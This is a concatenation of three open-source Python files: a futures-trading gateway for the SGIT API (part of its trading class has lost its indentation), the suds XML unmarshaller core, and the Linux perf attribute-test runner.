            self.gateway.onError(err)

    #----------------------------------------------------------------------
    def onRspUserLogout(self, data, error, i, last):
        """Logout response."""
        # On success, push a log event
        if error['ErrorID'] == 0:
            self.loginStatus = False
            # BUGFIX: this is the market data API, so clear mdConnected
            # (the original cleared tdConnected - copy-pasted from the trading API)
            self.gateway.mdConnected = False

            log = VtLogData()
            log.gatewayName = self.gatewayName
            # BUGFIX: report the market data server, not the trading server
            log.logContent = u'行情服务器登出完成'
            self.gateway.onLog(log)

        # Otherwise push an error event
        else:
            err = VtErrorData()
            err.gatewayName = self.gatewayName
            err.errorID = error['ErrorID']
            err.errorMsg = error['ErrorMsg'].decode('gbk')
            self.gateway.onError(err)

    #----------------------------------------------------------------------
    def onRtnDepthMarketData(self, data):
        """Market data push."""
        tick = VtTickData()
        tick.gatewayName = self.gatewayName

        tick.symbol = data['InstrumentID']
        tick.exchange = exchangeMapReverse.get(data['ExchangeID'], u'未知')
        tick.vtSymbol = tick.symbol #'.'.join([tick.symbol, EXCHANGE_UNKNOWN])

        tick.lastPrice = data['LastPrice']
        tick.volume = data['Volume']
        tick.openInterest = data['OpenInterest']
        tick.time = '.'.join([data['UpdateTime'], str(data['UpdateMillisec']/100)])
        tick.date = data['TradingDay']

        tick.openPrice = data['OpenPrice']
        tick.highPrice = data['HighestPrice']
        tick.lowPrice = data['LowestPrice']
        tick.preClosePrice = data['PreClosePrice']

        tick.upperLimit = data['UpperLimitPrice']
        tick.lowerLimit = data['LowerLimitPrice']

        # Five levels of depth are copied here (the original comment claimed
        # SGIT only provides one level, but all five are filled below)
        tick.bidPrice1 = data['BidPrice1']
        tick.bidVolume1 = data['BidVolume1']
        tick.askPrice1 = data['AskPrice1']
        tick.askVolume1 = data['AskVolume1']

        tick.bidPrice2 = data['BidPrice2']
        tick.bidVolume2 = data['BidVolume2']
        tick.askPrice2 = data['AskPrice2']
        tick.askVolume2 = data['AskVolume2']

        tick.bidPrice3 = data['BidPrice3']
        tick.bidVolume3 = data['BidVolume3']
        tick.askPrice3 = data['AskPrice3']
        tick.askVolume3 = data['AskVolume3']

        tick.bidPrice4 = data['BidPrice4']
        tick.bidVolume4 = data['BidVolume4']
        tick.askPrice4 = data['AskPrice4']
        tick.askVolume4 = data['AskVolume4']

        tick.bidPrice5 = data['BidPrice5']
        tick.bidVolume5 = data['BidVolume5']
        tick.askPrice5 = data['AskPrice5']
        tick.askVolume5 = data['AskVolume5']

        self.gateway.onTick(tick)
########################################################################
class SgitTdApi(TdApi):
"""SGIT交易API实现"""
#----------------------------------------------------------------------
def __init__(self, gateway):
"""API对象的初始化函数"""
super(SgitTdApi, self).__init__()
self.gateway = gateway # gateway对象
self.gatewayName = gateway.gatewayName # gateway对象名称
self.reqID = EMPTY_INT # 操作请求编号
self.orderRef = EMPTY_INT # 订单编号
self.connectionStatus = False # 连接状态
self.loginStatus = False # 登录状态
self.userID = EMPTY_STRING # 账号
self.password = EMPTY_STRING # 密码
self.brokerID = EMPTY_STRING # 经纪商代码
self.address = EMPTY_STRING # 服务器地址
self.investorID = EMPTY_STRING # 投资者代码
self.frontID = EMPTY_INT # 前置机编号
self.sessionID = EMPTY_INT # 会话编号
self.localID = 0 # 本地委托代码
self.orderDict = {} # 缓存委托对象的字典
self.localSysDict = {} # key为本地委托代码,value为交易所系统代码
self.cancelReqDict = {} # key为本地委托代码,value为撤单请求
#----------------------------------------------------------------------
def connect(self, userID, password, brokerID, address):
"""初始化连接"""
self.userID = userID # 账号
self.password = password # 密码
self.brokerID = brokerID # 经纪商代码
self.address = address # 服务器地址
# 如果尚未建立服务器连接,则进行连接
if not self.connectionStatus:
# 创建C++环境中的API对象,这里传入的参数是需要用来保存.con文件的文件夹路径
path = os.getcwd() + '/temp/' + self.gatewayName + '/'
if not os.path.exists(path):
os.makedirs(path)
self.createFtdcTraderApi(path)
# 订阅数据流
self.subscribePrivateTopic(0)
self.subscribePublicTopic(0)
# 注册服务器地址
self.registerFront(self.address)
# 初始化连接,成功会调用onFrontConnected
self.init(False)
# 若已经连接但尚未登录,则进行登录
else:
if not self.loginStatus:
self.login()
#----------------------------------------------------------------------
def login(self):
"""连接服务器"""
# 如果填入了用户名密码等,则登录
if self.userID and self.password and self.brokerID:
req = {}
req['UserID'] = self.userID
req['Password'] = self.password
req['BrokerID'] = self.brokerID
self.reqID += 1
self.reqUserLogin(req, self.reqID)
#----------------------------------------------------------------------
def qryAccount(self):
"""查询账户"""
self.reqID += 1
self.reqQryTradingAccount({}, self.reqID)
#----------------------------------------------------------------------
def qryPosition(self):
"""查询持仓"""
self.reqID += 1
req = {}
req['BrokerID'] = self.brokerID
req['InvestorID'] = self.userID
self.reqQryInvestorPosition(req, self.reqID)
#----------------------------------------------------------------------
def sendOrder(self, orderReq):
"""发单"""
self.reqID += 1
self.localID += 1
strID = str(self.localID).rjust(12, '0')
req = {}
req['InstrumentID'] = orderReq.symbol
req['LimitPrice'] = orderReq.price
req['VolumeTotalOriginal'] = orderReq.volume
# 下面如果由于传入的类型本接口不支持,则会返回空字符串
try:
req['OrderPriceType'] = priceTypeMap[orderReq.priceType]
req['Direction'] = directionMap[orderReq.direction]
req['CombOffsetFlag'] = offsetMap[orderReq.offset]
except KeyError:
return ''
req['OrderRef'] = strID
req['InvestorID'] = self.investorID
req['UserID'] = self.userID
req['BrokerID'] = self.brokerID
req['CombHedgeFlag'] = defineDict['Sgit_FTDC_HF_Speculation'] # 投机单
req['ContingentCondition'] = defineDict['Sgit_FTDC_CC_Immediately'] # 立即发单
req['ForceCloseReason'] = defineDict['Sgit_FTDC_FCC_NotForceClose'] # 非强平
req['IsAutoSuspend'] = 0 # 非自动挂起
req['TimeCondition'] = defineDict['Sgit_FTDC_TC_GFD'] # 今日有效
req['VolumeCondition'] = defineDict['Sgit_FTDC_VC_AV'] # 任意成交量
req['MinVolume'] = 1 # 最小成交量为1
self.reqOrderInsert(req, self.reqID)
# 返回订单号(字符串),便于某些算法进行动态管理
vtOrderID = '.'.join([self.gatewayName, strID])
return vtOrderID
#----------------------------------------------------------------------
def cancelOrder(self, cancelOrderReq):
"""撤单"""
# 如果OrderSysID的数据尚未返回,则把撤单请求缓存下来后直接返回
# 若已经返回,则获取strID对应的OrderSysID,并撤单
strID = cancelOrderReq.orderID
if strID not in self.localSysDict:
self.cancelReqDict[strID] = cancelOrderReq
return
sysID = self.localSysDict[strID]
self.reqID += 1
req = {}
req['InstrumentID'] = cancelOrderReq.symbol
req['ExchangeID'] = exchangeMap[cancelOrderReq.exchange]
req['OrderSysID'] = sysID
req['ActionFlag'] = defineDict['Sgit_FTDC_AF_Delete']
req['BrokerID'] = self.brokerID
req['InvestorID'] = self.userID
req['UserID'] = self.userID
self.reqOrderAction(req, self.reqID)
#----------------------------------------------------------------------
def close(self):
"""关闭"""
self.exit()
#----------------------------------------------------------------------
def onFrontConnected(self):
"""服务器连接"""
self.connectionStatus = True
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'交易服务器连接成功'
self.gateway.onLog(log)
self.login()
#----------------------------------------------------------------------
def onFrontDisconnected(self, msg):
"""服务器断开"""
self.connectionStatus = False
self.loginStatus = False
self.gateway.mdConnected = False
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'交易服务器连接断开'
self.gateway.onLog(log)
#----------------------------------------------------------------------
def onRspUserLogin(self, data, error, n, last):
'''登陆回报'''
# 如果登录成功,推送日志信息
if error['ErrorID'] == 0:
self.loginStatus = True
self.gateway.mdConnected = True
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'交易服务器登录完成'
self.gateway.onLog(log)
# 调用ready
self.ready()
# 查询投资者代码
self.reqID += 1
self.reqQryInvestor({}, self.reqID)
# 否则,推送错误信息
else:
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onRspUserLogout(self, data, error, n, last):
"""登出回报"""
# 如果登出成功,推送日志信息
if error['ErrorID'] == 0:
self.loginStatus = False
self.gateway.tdConnected = False
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'交易服务器登出完成'
self.gateway.onLog(log)
# 否则,推送错误信息
else:
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onRspUserPasswordUpdate(self, data, error, n, last):
""""""
pass
#----------------------------------------------------------------------
def onRspOrderInsert(self, data, error, n, last):
"""发单错误(柜台)"""
if error['ErrorID'] != 0:
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onRspOrderAction(self, data, error, n, last):
"""撤单错误(柜台)"""
# 获取委托对象
sysID = data['OrderSysID']
strID = data['OrderRef']
if sysID in self.orderDict:
order = self.orderDict[sysID]
else:
self.localSysDict[strID] = sysID
order = VtOrderData()
self.orderDict[sysID] = order
order.gatewayName = self.gatewayName
order.orderID = strID
order.vtOrderID = '.'.join([self.gatewayName, order.orderID])
# 推送错误信息
if error['ErrorID'] != 0:
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
else:
order.status = STATUS_CANCELLED
self.gateway.onOrder(order)
#----------------------------------------------------------------------
def onRspQryOrder(self, data, error, n, last):
""""""
pass
#----------------------------------------------------------------------
def onRspQryTradingAccount(self, data, error, n, last):
"""资金账户查询回报"""
account = VtAccountData()
account.gatewayName = self.gatewayName
# 账户代码
account.accountID = data['AccountID']
account.vtAccountID = '.'.join([self.gatewayName, account.accountID])
# 数值相关
account.preBalance = data['PreBalance']
account.available = data['Available']
account.commission = data['Commission']
account.margin = data['CurrMargin']
account.closeProfit = data['CloseProfit']
account.positionProfit = data['PositionProfit']
# 这里的balance和快期中的账户不确定是否一样,需要测试
account.balance = (data['PreBalance'] - data['PreCredit'] - data['PreMortgage'] +
data['Mortgage'] - data['Withdraw'] + data['Deposit'] +
data['CloseProfit'] + data['PositionProfit'] + data['CashIn'] -
data['Commission'])
# 推送
self.gateway.onAccount(account)
#----------------------------------------------------------------------
def onRspQryInvestor(self, data, error, n, last):
""""""
self.investorID = data['InvestorID']
if last:
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'投资者编码获取完成'
self.gateway.onLog(log)
# 查询合约
self.reqID += 1
self.reqQryInstrument({}, self.reqID)
#----------------------------------------------------------------------
def onRspQryInstrument(self, data, error, n, last):
"""合约查询回报"""
contract = VtContractData()
contract.gatewayName = self.gatewayName
contract.symbol = data['InstrumentID']
contract.exchange = exchangeMapReverse[data['ExchangeID']]
contract.vtSymbol = contract.symbol #'.'.join([contract.symbol, contract.exchange])
contract.name = data['InstrumentName'].decode('GBK')
# 合约数值
contract.size = data['VolumeMultiple']
contract.priceTick = data['PriceTick']
# 合约类型
if contract.exchange == EXCHANGE_SGE:
if '(' in contract.symbol:
contract.productClass = PRODUCT_DEFER
else:
contract.productClass = PRODUCT_SPOT
else:
contract.productClass = PRODUCT_FUTURES
# 推送
self.gateway.onContract(contract)
if last:
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'交易合约信息获取完成'
self.gateway.onLog(log)
#----------------------------------------------------------------------
def onRtnOrder(self, data, error):
"""报单回报"""
# 获取委托对象
sysID = data['OrderSysID']
strID = data['OrderRef']
newID = int(strID)
if newID > self.localID:
self.localID = newID
if sysID in self.orderDict:
order = self.orderDict[sysID]
else:
self.localSysDict[strID] = sysID
order = VtOrderData()
self.orderDict[sysID] = order
order.gatewayName = self.gatewayName
order.orderID = strID
order.vtOrderID = '.'.join([self.gatewayName, order.orderID])
order.symbol = data['InstrumentID']
order.exchange = exchangeMapReverse[data['ExchangeID']]
order.vtSymbol = order.symbol
order.direction = directionMapReverse.get(data['Direction'], DIRECTION_UNKNOWN)
order.offset = offsetMapReverse.get(data['CombOffsetFlag'], OFFSET_UNKNOWN)
order.totalVolume = data['VolumeTotalOriginal']
order.price = data['LimitPrice']
# 推送错误信息
if error['ErrorID'] == 0:
# 如果没有错误信息,则认为委托有效未成交
if not order.status:
order.status = STATUS_NOTTRADED
else:
# 如果有错误信息,委托被自动撤单
order.status = STATUS_CANCELLED
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
# 推送
self.gateway.onOrder(order)
# 检查是否有待撤单请求
if strID in self.cancelReqDict:
req = self.cancelReqDict.pop(strID)
self.cancelOrder(req)
#----------------------------------------------------------------------
def onRtnTrade(self, data):
"""成交回报"""
# 更新委托
sysID = data['OrderSysID']
strID = data['OrderRef']
if sysID in self.orderDict:
order = self.orderDict[sysID]
else:
self.localSysDict[strID] = sysID
order = VtOrderData()
self.orderDict[sysID] = order
order.gatewayName = self.gatewayName
order.orderID = strID
order.vtOrderID = '.'.join([self.gatewayName, order.orderID])
order.tradedVolume += data['Volume']
if order.tradedVolume == order.totalVolume:
order.status = STATUS_ALLTRADED
else:
order.status = STATUS_PARTTRADED
# 更新成交
trade = VtTradeData()
trade.gatewayName = self.gatewayName
trade.symbol = data['InstrumentID']
trade.exchange = exchangeMapReverse[data['ExchangeID']]
trade.vtSymbol = trade.symbol
trade.tradeID = data['TradeID']
trade.vtTradeID = '.'.join([self.gatewayName, trade.tradeID])
trade.orderID = order.orderID
trade.vtOrderID = '.'.join([self.gatewayName, trade.orderID])
# 方向
trade.direction = directionMapReverse.get(data['Direction'], '')
# 开平
trade.offset = offsetMapReverse.get(data['OffsetFlag'], '')
# 价格、报单量等数值
trade.price = data['Price']
trade.volume = data['Volume']
trade.tradeTime = data['TradeTime']
# 推送
self.gateway.onTrade(trade)
self.gateway.onOrder(order)
#----------------------------------------------------------------------
def onRtnInstrumentStatus(self, data):
    """Instrument status push; intentionally ignored by this gateway."""
    pass
#----------------------------------------------------------------------
def onRspQryInvestorPositionDetail(self, data, error, n, last):
    """Position-detail query response; intentionally ignored."""
    pass
#----------------------------------------------------------------------
def onRspQryInvestorPosition(self, data, error, n, last):
    """Position query response: convert one CTP position row and push it."""
    # Filter the empty rows CTP sends when there is no position data.
    if not data['InstrumentID']:
        return
    pos = VtPositionData()
    pos.gatewayName = self.gatewayName
    # Contract code.
    pos.symbol = data['InstrumentID']
    pos.vtSymbol = pos.symbol  # data carries no ExchangeID field here
    # Direction and frozen volume: long/net positions freeze LongFrozen,
    # short positions freeze ShortFrozen.
    pos.direction = posiDirectionMapReverse.get(data['PosiDirection'], '')
    if pos.direction == DIRECTION_NET or pos.direction == DIRECTION_LONG:
        pos.frozen = data['LongFrozen']
    elif pos.direction == DIRECTION_SHORT:
        pos.frozen = data['ShortFrozen']
    # Position volume.
    # NOTE(review): 'position' is filled from TodayPosition only, with
    # yesterday's volume kept separately in ydPosition -- confirm callers
    # expect that split rather than the total 'Position' field.
    pos.position = data['TodayPosition']
    pos.ydPosition = data['YdPosition']
    # Average holding price (guarded against division by zero).
    if pos.position:
        pos.price = data['PositionCost'] / pos.position
    # VT position key: symbol + direction.
    pos.vtPositionName = '.'.join([pos.vtSymbol, pos.direction])
    # Push to the gateway.
    self.gateway.onPosition(pos)
#----------------------------------------------------------------------
def print_dict(d):
    """Print each key/value pair of *d* on its own line, sorted by key.

    Works on both Python 2 and 3: the original used the Python-2-only
    ``print`` statement and the list-returning ``d.keys()`` + ``sort()``
    idiom, which breaks on Python 3.
    """
    for k in sorted(d):
        # Same output as the old "print k, ':', d[k]" (space-separated).
        print('%s : %s' % (k, d[k]))
| mit |
multikatt/CouchPotatoServer | libs/suds/umx/core.py | 199 | 7575 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( jortel@redhat.com )
"""
Provides base classes for XML->object I{unmarshalling}.
"""
from logging import getLogger
from suds import *
from suds.umx import *
from suds.umx.attrlist import AttrList
from suds.sax.text import Text
from suds.sudsobject import Factory, merge
log = getLogger(__name__)
reserved = { 'class':'cls', 'def':'dfn', }
class Core:
    """
    The abstract XML I{node} unmarshaller. This class provides the
    I{core} unmarshalling functionality.
    """

    def process(self, content):
        """
        Process an object graph representation of the xml I{node}.
        @param content: The current content being unmarshalled.
        @type content: L{Content}
        @return: A suds object.
        @rtype: L{Object}
        """
        self.reset()
        return self.append(content)

    def append(self, content):
        """
        Process the specified node and convert the XML document into
        a I{suds} L{object}.
        @param content: The current content being unmarshalled.
        @type content: L{Content}
        @return: A I{append-result} tuple as: (L{Object}, I{value})
        @rtype: I{append-result}
        @note: This is not the proper entry point.
        @see: L{process()}
        """
        self.start(content)
        self.append_attributes(content)
        self.append_children(content)
        self.append_text(content)
        self.end(content)
        return self.postprocess(content)

    def postprocess(self, content):
        """
        Perform final processing of the resulting data structure as follows:
        - Mixed values (children and text) will have a result of the I{content.node}.
        - Semi-simple values (attributes, no-children and text) will have a result of a
          property object.
        - Simple values (no-attributes, no-children with text nodes) will have a string
          result equal to the value of the content.node.getText().
        @param content: The current content being unmarshalled.
        @type content: L{Content}
        @return: The post-processed result.
        @rtype: I{any}
        """
        node = content.node
        # Mixed content: hand the raw node back to the caller.
        if len(node.children) and node.hasText():
            return node
        attributes = AttrList(node.attributes)
        # Semi-simple: real attributes + text, no children -> merge a
        # property object into the data collected so far.
        if attributes.rlen() and \
            not len(node.children) and \
            node.hasText():
            p = Factory.property(node.name, node.getText())
            return merge(content.data, p)
        # Complex: children populated the suds object.
        if len(content.data):
            return content.data
        lang = attributes.lang()
        # Explicit xsi:nil -> None regardless of nillable().
        if content.node.isnil():
            return None
        # Empty element: None when nillable, otherwise an empty Text.
        if not len(node.children) and content.text is None:
            if self.nillable(content):
                return None
            else:
                return Text('', lang=lang)
        # Simple text value (basestring: this is a Python 2 codebase).
        if isinstance(content.text, basestring):
            return Text(content.text, lang=lang)
        else:
            return content.text

    def append_attributes(self, content):
        """
        Append attribute nodes into L{Content.data}.
        Attributes in the I{schema} or I{xml} namespaces are skipped.
        @param content: The current content being unmarshalled.
        @type content: L{Content}
        """
        attributes = AttrList(content.node.attributes)
        for attr in attributes.real():
            name = attr.name
            value = attr.value
            self.append_attribute(name, value, content)

    def append_attribute(self, name, value, content):
        """
        Append an attribute name/value into L{Content.data}.
        @param name: The attribute name
        @type name: basestring
        @param value: The attribute's value
        @type value: basestring
        @param content: The current content being unmarshalled.
        @type content: L{Content}
        """
        key = name
        # Prefix with '_' (and rename python keywords) so the attribute
        # never collides with a child element of the same name.
        key = '_%s' % reserved.get(key, key)
        setattr(content.data, key, value)

    def append_children(self, content):
        """
        Append child nodes into L{Content.data}
        @param content: The current content being unmarshalled.
        @type content: L{Content}
        """
        for child in content.node:
            cont = Content(child)
            cval = self.append(cont)
            key = reserved.get(child.name, child.name)
            # A repeated child name promotes the value to a list.
            if key in content.data:
                v = getattr(content.data, key)
                if isinstance(v, list):
                    v.append(cval)
                else:
                    setattr(content.data, key, [v, cval])
                continue
            # Unbounded (maxOccurs > 1) children are always stored as lists.
            if self.unbounded(cont):
                if cval is None:
                    setattr(content.data, key, [])
                else:
                    setattr(content.data, key, [cval,])
            else:
                setattr(content.data, key, cval)

    def append_text(self, content):
        """
        Append text nodes into L{Content.data}
        @param content: The current content being unmarshalled.
        @type content: L{Content}
        """
        if content.node.hasText():
            content.text = content.node.getText()

    def reset(self):
        # Hook for subclasses; the core unmarshaller keeps no state.
        pass

    def start(self, content):
        """
        Processing on I{node} has started. Build and return
        the proper object.
        @param content: The current content being unmarshalled.
        @type content: L{Content}
        @return: A subclass of Object.
        @rtype: L{Object}
        """
        content.data = Factory.object(content.node.name)

    def end(self, content):
        """
        Processing on I{node} has ended.
        @param content: The current content being unmarshalled.
        @type content: L{Content}
        """
        pass

    def bounded(self, content):
        """
        Get whether the content is bounded (not a list).
        @param content: The current content being unmarshalled.
        @type content: L{Content}
        @return: True if bounded, else False
        @rtype: boolean
        """
        return ( not self.unbounded(content) )

    def unbounded(self, content):
        """
        Get whether the object is unbounded (a list).
        Subclasses with schema knowledge override this; the core default
        treats everything as bounded.
        @param content: The current content being unmarshalled.
        @type content: L{Content}
        @return: True if unbounded, else False
        @rtype: boolean
        """
        return False

    def nillable(self, content):
        """
        Get whether the object is nillable.
        Subclasses with schema knowledge override this; the core default
        is not nillable.
        @param content: The current content being unmarshalled.
        @type content: L{Content}
        @return: True if nillable, else False
        @rtype: boolean
        """
        return False
MISL-EBU-System-SW/lsp-public | tools/perf/tests/attr.py | 1266 | 9424 | #! /usr/bin/python
import os
import sys
import glob
import optparse
import tempfile
import logging
import shutil
import ConfigParser
class Fail(Exception):
    """Raised when a test's recorded events do not match its expectations."""

    def __init__(self, test, msg):
        self.test = test
        self.msg = msg

    def getMsg(self):
        """Return a human-readable failure message naming the test file."""
        return "'%s' - %s" % (self.test.path, self.msg)
class Unsup(Exception):
    """Raised when the perf command under test exits with an unexpected code."""

    def __init__(self, test):
        self.test = test

    def getMsg(self):
        """Return the quoted path of the unsupported test file."""
        return "'%s'" % self.test.path
class Event(dict):
    """One perf event record: a mapping of perf_event_attr term -> value.

    Values are compared as strings; '|' separates allowed alternatives and
    '*' matches anything (see compare_data()).
    """

    # perf_event_attr terms taking part in equal()/diff() comparison.
    terms = [
        'cpu',
        'flags',
        'type',
        'size',
        'config',
        'sample_period',
        'sample_type',
        'read_format',
        'disabled',
        'inherit',
        'pinned',
        'exclusive',
        'exclude_user',
        'exclude_kernel',
        'exclude_hv',
        'exclude_idle',
        'mmap',
        'comm',
        'freq',
        'inherit_stat',
        'enable_on_exec',
        'task',
        'watermark',
        'precise_ip',
        'mmap_data',
        'sample_id_all',
        'exclude_host',
        'exclude_guest',
        'exclude_callchain_kernel',
        'exclude_callchain_user',
        'wakeup_events',
        'bp_type',
        'config1',
        'config2',
        'branch_sample_type',
        'sample_regs_user',
        'sample_stack_user',
    ]

    def add(self, data):
        """Merge an iterable of (key, value) pairs into this event."""
        for key, val in data:
            log.debug("    %s = %s" % (key, val))
            self[key] = val

    def __init__(self, name, data, base):
        """Build the event from *base* items overridden by *data* items."""
        log.debug("  Event %s" % name)
        self.name = name
        self.group = ''
        self.add(base)
        self.add(data)

    def compare_data(self, a, b):
        """Return True when string values *a* and *b* match.

        Both sides may carry multiple '|'-separated alternatives; '*' on
        either side matches anything.
        """
        a_list = a.split('|')
        b_list = b.split('|')
        for a_item in a_list:
            for b_item in b_list:
                if (a_item == b_item):
                    return True
                elif (a_item == '*') or (b_item == '*'):
                    return True
        return False

    def equal(self, other):
        """Return True when every term is present and equal in both events."""
        for t in Event.terms:
            # BUG FIX: test membership *before* logging. The old code
            # formatted self[t]/other[t] into the debug message first, so a
            # missing term raised KeyError instead of returning False (and
            # it used the Python-2-only dict.has_key()).
            if t not in self or t not in other:
                return False
            log.debug("      [%s] %s %s" % (t, self[t], other[t]))
            if not self.compare_data(self[t], other[t]):
                return False
        return True

    def diff(self, other):
        """Log a warning for every term whose values differ between events."""
        for t in Event.terms:
            if t not in self or t not in other:
                continue
            if not self.compare_data(self[t], other[t]):
                log.warning("expected %s=%s, got %s" % (t, self[t], other[t]))
# Test file description needs to have following sections:
# [config]
# - just single instance in file
# - needs to specify:
# 'command' - perf command name
# 'args' - special command arguments
# 'ret' - expected command return value (0 by default)
#
# [eventX:base]
# - one or multiple instances in file
# - expected values assignments
class Test(object):
    """One attr test: runs a perf command and matches the events it
    recorded (via PERF_TEST_ATTR) against the expectations described in
    the ini-style test file (see the format comment above)."""

    def __init__(self, path, options):
        parser = ConfigParser.SafeConfigParser()
        parser.read(path)
        log.warning("running '%s'" % path)
        self.path = path
        self.test_dir = options.test_dir
        self.perf = options.perf
        self.command = parser.get('config', 'command')
        self.args = parser.get('config', 'args')
        try:
            self.ret = parser.get('config', 'ret')
        except:
            # 'ret' is optional in the test file; default to success.
            self.ret = 0
        self.expect = {}
        self.result = {}
        log.debug("  loading expected events");
        self.load_events(path, self.expect)

    def is_event(self, name):
        # Section names containing the word 'event' describe event records.
        if name.find("event") == -1:
            return False
        else:
            return True

    def load_events(self, path, events):
        """Parse every event section of *path* into *events* (name -> Event)."""
        parser_event = ConfigParser.SafeConfigParser()
        parser_event.read(path)
        # The event record section header contains 'event' word,
        # optionaly followed by ':' allowing to load 'parent
        # event' first as a base
        for section in filter(self.is_event, parser_event.sections()):
            parser_items = parser_event.items(section);
            base_items = {}
            # Read parent event if there's any
            if (':' in section):
                base = section[section.index(':') + 1:]
                parser_base = ConfigParser.SafeConfigParser()
                parser_base.read(self.test_dir + '/' + base)
                base_items = parser_base.items('event')
            e = Event(section, parser_items, base_items)
            events[section] = e

    def run_cmd(self, tempdir):
        """Run the perf command; raise Unsup on an unexpected exit code."""
        cmd = "PERF_TEST_ATTR=%s %s %s -o %s/perf.data %s" % (tempdir,
            self.perf, self.command, tempdir, self.args)
        ret = os.WEXITSTATUS(os.system(cmd))
        log.info("  '%s' ret %d " % (cmd, ret))
        if ret != int(self.ret):
            raise Unsup(self)

    def compare(self, expect, result):
        """Check every event in *expect* has a match in *result*; then check
        group leadership is consistent between the two sides."""
        match = {}
        log.debug("  compare");
        # For each expected event find all matching
        # events in result. Fail if there's not any.
        for exp_name, exp_event in expect.items():
            exp_list = []
            log.debug("    matching [%s]" % exp_name)
            for res_name, res_event in result.items():
                log.debug("      to [%s]" % res_name)
                if (exp_event.equal(res_event)):
                    exp_list.append(res_name)
                    log.debug("    ->OK")
                else:
                    log.debug("    ->FAIL");
            log.debug("    match: [%s] matches %s" % (exp_name, str(exp_list)))
            # we did not any matching event - fail
            # NOTE(review): diff() uses res_event from the loop above, i.e.
            # the *last* examined result event (NameError if result is
            # empty) -- presumably good enough for diagnostics; confirm.
            if (not exp_list):
                exp_event.diff(res_event)
                raise Fail(self, 'match failure');
            match[exp_name] = exp_list
        # For each defined group in the expected events
        # check we match the same group in the result.
        for exp_name, exp_event in expect.items():
            group = exp_event.group
            if (group == ''):
                continue
            for res_name in match[exp_name]:
                res_group = result[res_name].group
                if res_group not in match[group]:
                    raise Fail(self, 'group failure')
                log.debug("    group: [%s] matches group leader %s" %
                    (exp_name, str(match[group])))
        log.debug("  matched")

    def resolve_groups(self, events):
        """Translate each event's numeric group_fd into the leader's name."""
        for name, event in events.items():
            group_fd = event['group_fd'];
            if group_fd == '-1':
                continue;
            for iname, ievent in events.items():
                if (ievent['fd'] == group_fd):
                    event.group = iname
                    log.debug('[%s] has group leader [%s]' % (name, iname))
                    break;

    def run(self):
        """Execute the test end to end inside a throwaway temp directory."""
        tempdir = tempfile.mkdtemp();
        try:
            # run the test script
            self.run_cmd(tempdir);
            # load events expectation for the test
            log.debug("  loading result events");
            for f in glob.glob(tempdir + '/event*'):
                self.load_events(f, self.result);
            # resolve group_fd to event names
            self.resolve_groups(self.expect);
            self.resolve_groups(self.result);
            # do the expectation - results matching - both ways
            self.compare(self.expect, self.result)
            self.compare(self.result, self.expect)
        finally:
            # cleanup
            shutil.rmtree(tempdir)
def run_tests(options):
    """Run every test file matching options.test under options.test_dir.

    Tests raising Unsup (unsupported perf invocation) are reported as
    warnings and skipped; Fail propagates to the caller.
    """
    for f in glob.glob(options.test_dir + '/' + options.test):
        try:
            Test(f, options).run()
        # 'except X as e' replaces the Python-2-only 'except X, e' form;
        # it is valid on Python 2.6+ and required on Python 3.
        except Unsup as obj:
            log.warning("unsupp  %s" % obj.getMsg())
def setup_log(verbose):
    """Configure the module-global 'test' logger.

    Higher *verbose* counts produce more output:
    0 -> CRITICAL, 1 -> WARNING, 2 -> INFO, 3+ -> DEBUG.
    """
    global log
    if verbose >= 3:
        level = logging.DEBUG
    elif verbose == 2:
        level = logging.INFO
    elif verbose == 1:
        level = logging.WARNING
    else:
        level = logging.CRITICAL
    log = logging.getLogger('test')
    log.setLevel(level)
    handler = logging.StreamHandler()
    handler.setLevel(level)
    handler.setFormatter(logging.Formatter('%(message)s'))
    log.addHandler(handler)
USAGE = '''%s [OPTIONS]
-d dir # tests dir
-p path # perf binary
-t test # single test
-v # verbose level
''' % sys.argv[0]
def main():
    """Parse command-line options and run the matching attr tests.

    Exits non-zero on wrong arguments, a missing -d option, or a Fail
    raised by any test. (Python 2 print/except syntax kept as-is.)
    """
    parser = optparse.OptionParser(usage=USAGE)
    parser.add_option("-t", "--test",
        action="store", type="string", dest="test")
    parser.add_option("-d", "--test-dir",
        action="store", type="string", dest="test_dir")
    parser.add_option("-p", "--perf",
        action="store", type="string", dest="perf")
    parser.add_option("-v", "--verbose",
        action="count", dest="verbose")
    options, args = parser.parse_args()
    if args:
        # parser.error() already exits; the return is defensive.
        parser.error('FAILED wrong arguments %s' % ' '.join(args))
        return -1
    setup_log(options.verbose)
    if not options.test_dir:
        print 'FAILED no -d option specified'
        sys.exit(-1)
    if not options.test:
        # Default: run every file named test* in the test directory.
        options.test = 'test*'
    try:
        run_tests(options)
    except Fail, obj:
        print "FAILED %s" % obj.getMsg();
        sys.exit(-1)
    sys.exit(0)
if __name__ == '__main__':
main()
| gpl-2.0 |
